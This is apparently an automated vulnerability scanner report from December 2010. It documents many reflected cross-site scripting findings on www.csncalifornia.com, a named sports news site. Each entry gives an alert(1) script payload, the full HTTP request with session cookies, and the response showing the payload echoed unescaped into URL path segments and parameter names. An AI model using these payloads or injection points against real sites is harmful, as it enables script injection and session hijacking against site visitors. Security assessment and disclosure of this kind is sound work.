GET /?13b5a"><script>alert(1)</script>20777afd731=1 HTTP/1.1 Host: www.csncalifornia.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache Vary: Accept-Encoding Content-Type: text/html Expires: Sun, 19 Dec 2010 18:31:01 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:31:01 GMT Connection: close Set-Cookie: PHPSESSID=7ec6ef4cff790030950ccceec1a36f22; path=/ Content-Length: 98170
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> ...[SNIP]... <input type=hidden name="13b5a"><script>alert(1)</script>20777afd731" id = "13b5a"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d407"><script>alert(1)</script>b63af54bf8e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /111d407"><script>alert(1)</script>b63af54bf8e/22/10/Enter-to-win-FREE-Kings-Tickets-or-a-FRE/landing.html HTTP/1.1 Host: www.csncalifornia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;
Response
HTTP/1.1 200 OK Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:31:32 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:31:32 GMT Connection: close Connection: Transfer-Encoding Content-Length: 51817
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> ...[SNIP]... <form ID='formInvisible' action="/111d407"><script>alert(1)</script>b63af54bf8e/22/10/Enter-to-win-FREE-Kings-Tickets-or-a-FRE/landing.html"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ce80c"><script>alert(1)</script>e0e2993fc81 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /11/22ce80c"><script>alert(1)</script>e0e2993fc81/10/Enter-to-win-FREE-Kings-Tickets-or-a-FRE/landing.html HTTP/1.1 Host: www.csncalifornia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;
Response
HTTP/1.1 200 OK Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:31:33 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:31:33 GMT Connection: close Connection: Transfer-Encoding Content-Length: 51798
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> ...[SNIP]... <form ID='formInvisible' action="/11/22ce80c"><script>alert(1)</script>e0e2993fc81/10/Enter-to-win-FREE-Kings-Tickets-or-a-FRE/landing.html"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ef888"><script>alert(1)</script>c0087ef2dd5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /11/22/10ef888"><script>alert(1)</script>c0087ef2dd5/Enter-to-win-FREE-Kings-Tickets-or-a-FRE/landing.html HTTP/1.1 Host: www.csncalifornia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;
Response
HTTP/1.1 200 OK Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:31:35 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:31:35 GMT Connection: close Connection: Transfer-Encoding Content-Length: 51798
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> ...[SNIP]... <form ID='formInvisible' action="/11/22/10ef888"><script>alert(1)</script>c0087ef2dd5/Enter-to-win-FREE-Kings-Tickets-or-a-FRE/landing.html"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4c1d4"><script>alert(1)</script>e7c9caf2624 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /11/22/10/Enter-to-win-FREE-Kings-Tickets-or-a-FRE4c1d4"><script>alert(1)</script>e7c9caf2624/landing.html HTTP/1.1 Host: www.csncalifornia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;
Response
HTTP/1.1 200 OK Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:31:36 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:31:36 GMT Connection: close Connection: Transfer-Encoding Content-Length: 51817
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> ...[SNIP]... <form ID='formInvisible' action="/11/22/10/Enter-to-win-FREE-Kings-Tickets-or-a-FRE4c1d4"><script>alert(1)</script>e7c9caf2624/landing.html"> ...[SNIP]...
2.241. http://www.csncalifornia.com/11/22/10/Enter-to-win-FREE-Kings-Tickets-or-a-FRE/landing.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ead4d"><script>alert(1)</script>92c61a9dd4f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /11/22/10/Enter-to-win-FREE-Kings-Tickets-or-a-FRE/landing.html?ead4d"><script>alert(1)</script>92c61a9dd4f=1 HTTP/1.1 Host: www.csncalifornia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;
Response
HTTP/1.1 200 OK Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:31:30 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:31:30 GMT Connection: close Connection: Transfer-Encoding Content-Length: 51651
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> ...[SNIP]... <input type=hidden name="ead4d"><script>alert(1)</script>92c61a9dd4f" id = "ead4d"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c2e20"><script>alert(1)</script>337775cf04b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12c2e20"><script>alert(1)</script>337775cf04b/07/10/Text-to-Win-a-Flip-Sweepstakes/landing.html HTTP/1.1 Host: www.csncalifornia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;
Response
HTTP/1.1 200 OK Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:31:34 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:31:34 GMT Connection: close Connection: Transfer-Encoding Content-Length: 51737
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> ...[SNIP]... <form ID='formInvisible' action="/12c2e20"><script>alert(1)</script>337775cf04b/07/10/Text-to-Win-a-Flip-Sweepstakes/landing.html"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d81e"><script>alert(1)</script>1ea0c328bf5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12/071d81e"><script>alert(1)</script>1ea0c328bf5/10/Text-to-Win-a-Flip-Sweepstakes/landing.html HTTP/1.1 Host: www.csncalifornia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;
Response
HTTP/1.1 200 OK Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:31:35 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:31:35 GMT Connection: close Connection: Transfer-Encoding Content-Length: 51737
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> ...[SNIP]... <form ID='formInvisible' action="/12/071d81e"><script>alert(1)</script>1ea0c328bf5/10/Text-to-Win-a-Flip-Sweepstakes/landing.html"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 22d00"><script>alert(1)</script>3b9a8daff6a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12/07/1022d00"><script>alert(1)</script>3b9a8daff6a/Text-to-Win-a-Flip-Sweepstakes/landing.html HTTP/1.1 Host: www.csncalifornia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;
Response
HTTP/1.1 200 OK Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:31:36 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:31:36 GMT Connection: close Connection: Transfer-Encoding Content-Length: 51718
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> ...[SNIP]... <form ID='formInvisible' action="/12/07/1022d00"><script>alert(1)</script>3b9a8daff6a/Text-to-Win-a-Flip-Sweepstakes/landing.html"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 783a8"><script>alert(1)</script>753733aaae1 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12/07/10/Text-to-Win-a-Flip-Sweepstakes783a8"><script>alert(1)</script>753733aaae1/landing.html HTTP/1.1 Host: www.csncalifornia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;
Response
HTTP/1.1 200 OK Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:31:38 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:31:38 GMT Connection: close Connection: Transfer-Encoding Content-Length: 51737
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> ...[SNIP]... <form ID='formInvisible' action="/12/07/10/Text-to-Win-a-Flip-Sweepstakes783a8"><script>alert(1)</script>753733aaae1/landing.html"> ...[SNIP]...
2.246. http://www.csncalifornia.com/12/07/10/Text-to-Win-a-Flip-Sweepstakes/landing.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 696bb"><script>alert(1)</script>0b37ba3c0d4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12/07/10/Text-to-Win-a-Flip-Sweepstakes/landing.html?696bb"><script>alert(1)</script>0b37ba3c0d4=1 HTTP/1.1 Host: www.csncalifornia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;
Response
HTTP/1.1 200 OK Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:31:33 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:31:33 GMT Connection: close Connection: Transfer-Encoding Content-Length: 51552
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> ...[SNIP]... <input type=hidden name="696bb"><script>alert(1)</script>0b37ba3c0d4" id = "696bb"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 85497"><script>alert(1)</script>d032dfcbdb4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /1285497"><script>alert(1)</script>d032dfcbdb4/15/10/Report-Aubrey-Huff-wore-rhinestone-encru/landing_word_streets.html HTTP/1.1 Host: www.csncalifornia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;
Response
HTTP/1.1 200 OK Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:31:37 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:31:37 GMT Connection: close Connection: Transfer-Encoding Content-Length: 37373
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> ...[SNIP]... <form ID='formInvisible' action="/1285497"><script>alert(1)</script>d032dfcbdb4/15/10/Report-Aubrey-Huff-wore-rhinestone-encru/landing_word_streets.html"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a641b"><script>alert(1)</script>b77f2c3bf5a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12/15a641b"><script>alert(1)</script>b77f2c3bf5a/10/Report-Aubrey-Huff-wore-rhinestone-encru/landing_word_streets.html HTTP/1.1 Host: www.csncalifornia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;
Response
HTTP/1.1 200 OK Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:31:38 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:31:38 GMT Connection: close Connection: Transfer-Encoding Content-Length: 37373
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> ...[SNIP]... <form ID='formInvisible' action="/12/15a641b"><script>alert(1)</script>b77f2c3bf5a/10/Report-Aubrey-Huff-wore-rhinestone-encru/landing_word_streets.html"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 40ea7"><script>alert(1)</script>f3511ff7f64 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12/15/1040ea7"><script>alert(1)</script>f3511ff7f64/Report-Aubrey-Huff-wore-rhinestone-encru/landing_word_streets.html HTTP/1.1 Host: www.csncalifornia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;
Response
HTTP/1.1 200 OK Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:31:53 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:31:53 GMT Connection: close Connection: Transfer-Encoding Content-Length: 37373
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> ...[SNIP]... <form ID='formInvisible' action="/12/15/1040ea7"><script>alert(1)</script>f3511ff7f64/Report-Aubrey-Huff-wore-rhinestone-encru/landing_word_streets.html"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e36ea"><script>alert(1)</script>b1b0878059d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12/15/10/Report-Aubrey-Huff-wore-rhinestone-encrue36ea"><script>alert(1)</script>b1b0878059d/landing_word_streets.html HTTP/1.1 Host: www.csncalifornia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;
Response
HTTP/1.1 200 OK Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:31:54 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:31:54 GMT Connection: close Connection: Transfer-Encoding Content-Length: 37373
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> ...[SNIP]... <form ID='formInvisible' action="/12/15/10/Report-Aubrey-Huff-wore-rhinestone-encrue36ea"><script>alert(1)</script>b1b0878059d/landing_word_streets.html"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81447"><script>alert(1)</script>a1306ad1405 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /1281447"><script>alert(1)</script>a1306ad1405/15/10/Warriors-Lin-likely-headed-to-D-League/landing_warriors.html HTTP/1.1 Host: www.csncalifornia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;
Response
HTTP/1.1 200 OK Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:31:51 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:31:51 GMT Connection: close Connection: Transfer-Encoding Content-Length: 55333
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> ...[SNIP]... <form ID='formInvisible' action="/1281447"><script>alert(1)</script>a1306ad1405/15/10/Warriors-Lin-likely-headed-to-D-League/landing_warriors.html"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 602af"><script>alert(1)</script>146ab9d7a83 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12/15602af"><script>alert(1)</script>146ab9d7a83/10/Warriors-Lin-likely-headed-to-D-League/landing_warriors.html HTTP/1.1 Host: www.csncalifornia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;
Response
HTTP/1.1 200 OK Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:31:54 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:31:54 GMT Connection: close Connection: Transfer-Encoding Content-Length: 55314
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> ...[SNIP]... <form ID='formInvisible' action="/12/15602af"><script>alert(1)</script>146ab9d7a83/10/Warriors-Lin-likely-headed-to-D-League/landing_warriors.html"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45c0e"><script>alert(1)</script>36e3d581f3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12/15/1045c0e"><script>alert(1)</script>36e3d581f3/Warriors-Lin-likely-headed-to-D-League/landing_warriors.html HTTP/1.1 Host: www.csncalifornia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;
Response
HTTP/1.1 200 OK Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:31:56 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:31:56 GMT Connection: close Connection: Transfer-Encoding Content-Length: 55328
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> ...[SNIP]... <form ID='formInvisible' action="/12/15/1045c0e"><script>alert(1)</script>36e3d581f3/Warriors-Lin-likely-headed-to-D-League/landing_warriors.html"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b9913"><script>alert(1)</script>a067ea4d937 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12/15/10/Warriors-Lin-likely-headed-to-D-Leagueb9913"><script>alert(1)</script>a067ea4d937/landing_warriors.html HTTP/1.1 Host: www.csncalifornia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;
Response
HTTP/1.1 200 OK Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:31:58 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:31:58 GMT Connection: close Connection: Transfer-Encoding Content-Length: 55333
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> ...[SNIP]... <form ID='formInvisible' action="/12/15/10/Warriors-Lin-likely-headed-to-D-Leagueb9913"><script>alert(1)</script>a067ea4d937/landing_warriors.html"> ...[SNIP]...
2.255. http://www.csncalifornia.com/12/15/10/Warriors-Lin-likely-headed-to-D-League/landing_warriors.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36a52"><script>alert(1)</script>9406270512a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
